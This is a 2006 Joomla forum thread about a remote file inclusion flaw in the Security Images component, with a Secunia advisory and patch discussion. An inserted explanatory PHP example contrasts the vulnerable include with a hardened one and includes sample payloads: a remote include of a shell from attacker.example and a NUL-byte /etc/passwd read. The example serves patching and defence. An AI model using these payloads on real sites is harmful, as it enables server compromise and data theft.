Joomla!
http://forum.joomla.org/

[UPGRADE AVAIL.] Security Images Vulnerability
http://forum.joomla.org/viewtopic.php?f=296&t=81589

Author:  Elpie [ Mon Jul 31, 2006 1:29 pm ]
Post subject:  [UPGRADE AVAIL.] Security Images Vulnerability

Remote file include exploit is in the wild.

Author:  Kindred [ Mon Jul 31, 2006 2:15 pm ]
Post subject:  Re: Security Images 3.0.5

more specifics? ???

Author:  Elpie [ Mon Jul 31, 2006 2:47 pm ]
Post subject:  Re: Security Images 3.0.5

I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use.  I can only share that information with the project's developers, sorry :(

Author:  joomlaturk [ Mon Jul 31, 2006 4:28 pm ]
Post subject:  Re: Security Images 3.0.5

TITLE:
Joomla Security Images Component File Inclusion

SECUNIA ADVISORY ID:
SA21260

VERIFY ADVISORY:
http://secunia.com/advisories/21260/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Security Images 3.x (component for Joomla)
http://secunia.com/product/11186/

DESCRIPTION:
Drago84 has discovered some vulnerabilities in the Security Images
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter is not
properly verified before being used to include files. This can be
exploited to execute arbitrary PHP code by including files from local
or external resources.

Affected files:
administrator/components/com_securityimages/configinsert.php
administrator/components/com_securityimages/lang.php

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 3.0.5. Other
versions may also be affected.

SOLUTION:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

PROVIDED AND/OR DISCOVERED BY:
Drago84

ORIGINAL ADVISORY:
http://milw0rm.com/exploits/2083

----------------------------------------------------------------------

Author:  RobS [ Tue Aug 01, 2006 6:09 am ]
Post subject:  Re: Security Images 3.0.5

Thanks all for the info... added to the official list.

Author:  averan [ Tue Aug 01, 2006 6:26 pm ]
Post subject:  Re: Security Images 3.0.5

it seems to me that anyone who understands php could easily patch Security Images.

only 2 files are listed as liabilities....

and the fix suggested in this forum is to harden the call to
Code:
require_once($mosConfig_absolute_path."/administrator/components/com_securityimages/lang.php");
by defining the absolute path:
Code:
define( 'YOURBASEPATH', dirname(__FILE__) );
require_once( YOURBASEPATH . '/file_to_include.php' );


unfortunately, i don't know php well enough to apply this.

anyone?
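
The include quoted above and the dirname(__FILE__) fix suggested for it, side by side in runnable form. This is an added example, not code from the Security Images project or from anyone in this thread. register_globals no longer exists in current PHP, so its effect (every request parameter becoming a global variable) is emulated with extract(); the request payloads, the isSafeIncludePath() checker and the attacker host name are constructed for the example.

```php
<?php
// Added example: the vulnerable include pattern from the advisory beside the
// dirname(__FILE__) hardening. register_globals is emulated with extract();
// payloads, checker and host names below are constructed, not taken from the
// project or from any real incident.
declare(strict_types=1);

// Vulnerable pattern. lang.php and configinsert.php can be requested directly,
// so no configuration.php has defined $mosConfig_absolute_path before this code
// runs; with register_globals=On the only source for it is the query string.
function vulnerableIncludePath(array $request): string
{
    extract($request, EXTR_OVERWRITE);                 // emulates register_globals
    $mosConfig_absolute_path = $mosConfig_absolute_path ?? '';
    // With allow_url_include / allow_url_fopen on, require_once of a value like
    // "http://host/x.txt?" fetches and executes PHP from the attacker's server.
    return $mosConfig_absolute_path . '/administrator/components/com_securityimages/lang.php';
}

// Hardened pattern. The include root is derived from the location of the file
// that is running, so the request cannot change which file gets loaded even
// if register_globals stays on. Joomla 1.0 component files additionally start
// with: defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');
function hardenedIncludePath(array $request): string
{
    extract($request, EXTR_OVERWRITE);                 // attacker still sets the global...
    defined('YOURBASEPATH') || define('YOURBASEPATH', dirname(__FILE__));
    return YOURBASEPATH . '/lang.php';                 // ...but it is never consulted
}

// Review check for any value handed to include/require: reject URL wrappers
// (http://, ftp://, php://, data:), NUL bytes (path truncation on old PHP) and
// parent-directory traversal, then require the directory to resolve under the
// expected root. A Windows drive prefix like C: is also rejected by the scheme test.
function isSafeIncludePath(string $path, string $root): bool
{
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $path) === 1) {
        return false;
    }
    if (strpos($path, "\0") !== false || strpos($path, '..') !== false) {
        return false;
    }
    $dir      = realpath(dirname($path));
    $rootReal = realpath($root);
    if ($dir === false || $rootReal === false) {
        return false;
    }
    return $dir === $rootReal
        || strncmp($dir, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) === 0;
}

// Constructed payloads. The trailing "?" is the usual RFI trick: it turns the
// appended "/administrator/.../lang.php" into a query string on the remote host,
// so the remote file is fetched exactly as stored. The second payload is the
// local-file variant (NUL byte truncates the appended suffix on PHP < 5.3.4).
$payloads = [
    'remote' => ['mosConfig_absolute_path' => 'http://attacker.example/shell.txt?'],
    'local'  => ['mosConfig_absolute_path' => "/etc/passwd\0"],
];
$root = dirname(__FILE__);

foreach ($payloads as $label => $request) {
    $vuln = vulnerableIncludePath($request);
    $hard = hardenedIncludePath($request);
    printf("[%s] vulnerable -> %s (safe: %s)\n", $label, addcslashes($vuln, "\0"),
        isSafeIncludePath($vuln, $root) ? 'yes' : 'no');
    printf("[%s] hardened   -> %s (safe: %s)\n", $label, $hard,
        isSafeIncludePath($hard, $root) ? 'yes' : 'no');
}
```

Save it as a file and run it with the php command-line binary. The hardened path contains nothing from the request, so it is the same on every call; the vulnerable one is whatever the query string supplied, and the prefix check against the real root rejects it. The advisory's other remedy, register_globals = Off, removes the source of the variable, but the dirname(__FILE__) change protects the include even on hosts where that setting cannot be changed.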

Author:  Tonie [ Tue Aug 01, 2006 8:50 pm ]
Post subject:  Re: Security Images 3.0.5

Version 3.06 has been brought out: http://forge.joomla.org/sf/projects/com_securityimages.

Author:  tarquel [ Tue Aug 01, 2006 10:14 pm ]
Post subject:  Re: Security Images 3.0.5

wish i could get the new one to work :(

Using 3.0.6 and the latest Akobook version, but it just refuses to work.

Only can get the freecap plugin to appear - the other two just don't do anything - and even though it appears to work, when you submit the guestbook entry - having put the security word in, it doesn't work.

I thought that I was being dumb and that I hadn't realised it was case sensitive - but either I'm blind, or it really doesn't want to know.

I did wonder whether it was the hardening of the latest Joomla, but I'm not sure.

If anyone wants to try and see, go to the guestbook at: http://www.threeminutewarning.co.uk

I really feel like never updating any component or Joomla itself again as something always goes wrong hehe

/rant ;)

Cheers
Nath.

Author:  Elpie [ Wed Aug 02, 2006 1:44 am ]
Post subject:  Re: Security Images 3.0.5

Nath - make sure you report this on the bug tracker on the forge's project pages.
Project devs do see these reports but may miss seeing forum posts.

Author:  tarquel [ Wed Aug 02, 2006 5:31 pm ]
Post subject:  Re: Security Images 3.0.5

Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe Maybe it's me being dumb or something today lol

Cheers
Nath.

Author:  elmoch [ Wed Aug 02, 2006 10:44 pm ]
Post subject:  Re: Security Images 3.0.5

tarquel wrote:
Hi there

I've just posted a topic on their forum at http://forums.waltercedric.com/index.ph ... ,16.0.html

Can't seem to find the SF for the project hehe Maybe it's me being dumb or something today lol

Cheers
Nath.


Hi Nath,

From Walter Cedric's wiki you are referred to http://developer.joomla.org/sf/sfmain/d ... rityimages.
So that's the place to go!  :)

Author:  tarquel [ Wed Aug 02, 2006 11:26 pm ]
Post subject:  Re: Security Images 3.0.5

ahhhhh that's the one :)

Thanks [and it looks like all my problems have been mentioned already - except integration into the SMF Bridge perhaps]

Cheers
Nath.

Author:  karryberry [ Thu Dec 20, 2007 4:36 pm ]
Post subject:  Re: Security Images 3.0.5

Elpie wrote:
I wish I could give more specifics, but as far as I am aware an official advisory has not yet been issued. I got my information from two blackhat sites, both giving scripts to use.  I can only share that information with the projects developers, sorry :(


tell me more.

All times are UTC